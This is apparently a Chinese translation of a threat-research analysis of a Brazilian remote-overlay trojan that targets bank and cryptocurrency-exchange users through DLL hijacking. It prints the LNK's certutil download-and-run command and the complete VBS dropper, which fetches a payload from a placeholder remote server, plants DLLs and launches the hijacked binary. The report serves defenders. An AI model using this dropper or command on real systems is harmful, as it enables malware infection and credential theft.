远程overlay恶意软件非常多产和通用，它时不时就会出现，但在巴西通常很少发现特殊或复杂的金融恶意软件。而巴西金融网络犯罪分子使用的流行远程覆盖特洛伊木马这个特殊的变体有什么特别之处呢？首先，它使用了并不常见的动态链接库（DLL）劫持技术。更有意思的是，恶意软件的运营商不再只关注银行，他们现在也有兴趣窃取用户的加密货币交换账户，这与金融网络犯罪对加密货币的兴趣日益增长有关。

一、通过远程会话感染巴西用户

IBM X-Force研究持续跟踪巴西的威胁形势。在最近的分析中，我们的团队观察到远程overlay系列恶意软件的新变种感染了该地区的用户。

远程overlay特洛伊木马在针对巴西用户的欺诈中很常见。我们分析的最新变体使用DLL劫持技术远程控制受感染的设备，将其恶意代码加载到免费防病毒程序的合法二进制文件中。

恶意DLL是用Delphi编程语言编写的曲型巴西恶意软件，包含overlay图像（恶意软件在受感染的用户验证在线银行会话后在屏幕上overlay）。屏幕的外观和感觉与受害者银行的相匹配，需要提供个人信息和双因素身份验证（2FA）。

二、对加密货币兴趣与日俱增

加密货币交易账户正在变得比传统账户更受欢迎，这是巴西当地欺诈者可能熟悉并准备利用的趋势。

最近，巴西主要银行攻击活动中的变体针对加密货币交换平台。攻击方法类似于银行目标：通过窃取用户的帐户凭据，接管他们的帐户并将他们的钱转移到犯罪分子的帐户。

三、典型感染流程

查看此远程overly特洛伊木马的感染例程表明，当潜在受害者被诱骗下载其认为是正式发票的文件时，就会被初次感染。该文件是一个存档，其中包含最终会感染设备的恶意脚本。下面是典型感染策略的简要流程：

1. 受害者使用搜索引擎查找提供商的网站并支付月度发票。第一个结果是攻击者通过付费努力提升的恶意页面，而不是真正的网站。受害者访问该页面并键入其ID详细信息以获取发票。

2. 受害者不知不觉的下载了一个恶意LNK文件（Windows快捷方式文件），此文件存档在一个ZIP中，声称来自巴西交通运输部DETRAN。

3. LNK文件包含一个命令，该命令将从远程服务器下载恶意Visual Basic（VBS）脚本，并使用合法的Windows程序certutil运行。

4. 恶意VBS脚本从攻击者的远程服务器下载另一个ZIP文件，这次包含恶意软件的恶意DLL以及用于隐藏DLL的免费防病毒程序的合法二进制文件。

5. VBS脚本执行恶意软件，感染设备。

6. 部署后，特洛伊木马使用DLL劫持技术将其恶意DLL加载到防病毒程序的合法二进制文件中。这种迂回感染例程有助于恶意软件通过安全控制来逃避检测。

7. 完成安装后，恶意软件监视受害者的浏览器，并在受害者浏览目标在线银行网站或加密货币交换平台时开始行动。

8. 恶意DLL组件为恶意软件提供了远程控制功能。

四、深入探究恶意LNK文件

仔细查看LNK文件可以看出它滥用了certutil，certutil是作为证书服务的一部分安装的。

首先，从名为“tudodebom”的远程服务器下载恶意脚本：

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt“

· -urlcache 显示或删除URL缓存条目。

· -split -f 强制获取特定URL并更新缓存。

获取后，恶意软件会将文件名和扩展名从“tudodebom.txt”更改为“JNSzlEYAIubkggX.vbs”：

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs“

LNK文件调用Windows命令行（CMD）并执行certutil.exe以从远程主机下载TXT文件（.vbs）：

hXXps://remoteserver/turbulencianoar/tudodebom.txt

最后，恶意软件执行恶意VBS脚本。

五、检测VBS 脚本

VBS脚本下载包含恶意软件载荷的ZIP存档。然后，部署在受害者设备上具有以下命名模式的目录中：

“C:\AV product_” + RandomName + “\”

该过程完成后，该脚本将执行合法但有毒的二进制文件，该二进制文件将加载恶意DLL并启动与攻击者的命令和控制（C＆C）服务器的连接。

这个例程中有趣的元素包括：

· 使用合法的远程服务器来托管攻击工具;

· 滥用现有防病毒程序中的合法二进制文件来隐藏恶意软件的DLL;

· 恶意软件的命名约定，可以使恶意软件更容易在受感染的设备上检测和隔离。

在分析恶意软件后，我们发现了特洛伊木马用于部署其恶意DLL的VBS脚本，其中包含以下内容：

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject( “WScript.Shell” )
ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”
randname = getrandomstring()
exerandom = “AV product.SystrayStartTrigger-” + randname
filezip = “AuZwaaU.zip”
deffolder = “C:\AV product_” + randname + “\”
filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”
fileexe = “AuZwaaU.exe”
filedll = “AuZwaaU.sys”
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write ” ”
objFile.Close
‘WScript.Echo msg
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2
end with
WScript.Sleep 5000
set objShellApp = CreateObject(“Shell.Application”)
set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items
objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)
WScript.Sleep 5000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip
objFSO.CreateFolder deffolder
WScript.Sleep 3000
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”
objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”
WScript.Sleep 5000
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
Set objShell = CreateObject( “WScript.Shell” )
outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write “@echo off” & vbCrLf
objFile.Write “@cd ” & deffolder & vbCrLf
objFile.Write “start ” & exerandom & “.exe” & vbCrLf
objFile.Close
objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)
WScript.Sleep 10000
objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”
Set objShell = Nothing
Set objFSO = Nothing
Set objShellApp = Nothing
End If
Function getrandomstring()
Dim intMax, k, intValue, strChar, strName
Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
intMax = 6
Randomize()
strName = “”
For k = 1 To intMax
intValue = Fix(62 * Rnd())
strChar = Mid(Chars, intValue + 1, 1)
Randomize()
intValue = Fix(62 * Rnd())
strChar = strChar & Mid(Chars, intValue + 1, 1)
strName = strName & strChar
If (k < 6) Then
strName = strName & “”
End If
Next
getrandomstring = strName
End Function

六、远程Overlay 图像

最后强调一点，恶意软件的overlay图像不再是银行木马独有的技术。我们的分析表明，巴西的欺诈者对抢劫用户的加密货币同样感兴趣。

为实现这一目标，威胁行为者已经创建了许多overlay来匹配巴西使用的平台（我们已经审查了下面的平台徽标）。在每种情况下，攻击者都会提示用户验证他或她的电子邮件地址和身份，并使用他们的标记化方法用新的一次性密码确认用户的安全性。

图1：假overlay屏幕要求用户提供有关其身份的信息

图2：假overlay屏幕要求用户提交令牌号

2FA请求的overlay与目标平台的用户身份验证元素首选项相匹配，并包括来自电子邮件和社交帐户的单点登录（SSO）：

图3：假overlay屏幕要求受感染用户使用其网络邮件/社交帐户进行SSO身份验证

七、金融网络犯罪风险缓解

在巴西，恶意软件是网络犯罪分子欺骗互联网用户的最多产的策略之一。由于每次攻击都会影响大量用户，所以感染率可能很高。但通过持续的用户培训以及在用户设备上安装正确的控件帮助防范恶意软件，可以降低风险。